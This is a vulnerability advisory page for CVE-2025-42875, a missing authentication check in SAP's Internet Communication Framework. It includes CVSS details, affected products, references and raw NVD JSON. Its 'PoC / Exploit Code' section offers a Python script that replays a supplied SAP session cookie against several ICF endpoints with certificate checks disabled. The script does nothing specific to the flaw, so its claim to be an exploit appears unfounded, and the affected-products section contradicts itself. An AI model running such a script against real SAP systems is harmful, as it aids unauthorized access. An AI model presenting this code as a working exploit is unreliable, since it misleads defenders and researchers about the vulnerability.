Security Vulnerability Report
CVE-2025-42875 CVSS 6.6 MEDIUM

CVE-2025-42875

Published: 2025-12-09 16:17:52
Last Modified: 2026-04-15 00:35:42

Description

The SAP Internet Communication Framework does not conduct any authentication checks for features that need user identification allowing an attacker to reuse authorization tokens, violating secure authentication practices causing low impact on Confidentiality, Integrity and Availability of the application.

CVSS Details

CVSS Score
6.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

SAP Internet Communication Framework (ICF) - specific affected versions pending official disclosure by SAP
SAP NetWeaver AS ABAP - all versions without SAP Security Note 3591163 applied

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-42875 PoC - SAP ICF Authentication Bypass via Token Reuse
# Target: SAP Internet Communication Framework
# Note: This PoC demonstrates the token reuse attack vector


def exploit_sap_icf(target_url, valid_token):
    """Exploit SAP ICF by reusing authorization tokens"""
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        'Cookie': f'SAP_SESSIONID={valid_token}',
        'X-Requested-With': 'XMLHttpRequest'
    }

    # Target ICF endpoints that require user identification
    targets = [
        f'{target_url}/sap/public/icf_info',
        f'{target_url}/sap/bc/icf_info',
        f'{target_url}/sap/opu/odata/sap/user_info'
    ]

    for endpoint in targets:
        try:
            response = requests.get(endpoint, headers=headers, timeout=10, verify=False)
            if response.status_code == 200:
                print(f'[+] Successfully accessed: {endpoint}')
                print(f'    Response length: {len(response.content)} bytes')
            elif response.status_code == 401:
                print(f'[-] Authentication required: {endpoint}')
            else:
                print(f'[*] Unexpected response: {endpoint} - Status: {response.status_code}')
        except requests.RequestException as e:
            print(f'[-] Error accessing {endpoint}: {str(e)}')


if __name__ == '__main__':
    if len(sys.argv) < 3:
        print(f'Usage: python {sys.argv[0]} <target_url> <valid_token>')
        print('Example: python exploit.py https://sap.example.com:50000 ABC123DEF456')
        sys.exit(1)
    target = sys.argv[1]
    token = sys.argv[2]
    exploit_sap_icf(target, token)

References

https://me.sap.com/notes/3591163
https://url.sap/sapsecuritypatchday

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-42875", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:51.667", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The SAP Internet Communication Framework does not conduct any authentication checks for features that need user identification allowing an attacker to reuse authorization tokens, violating secure authentication practices causing low impact on Confidentiality, Integrity and Availability of the application."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://me.sap.com/notes/3591163", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}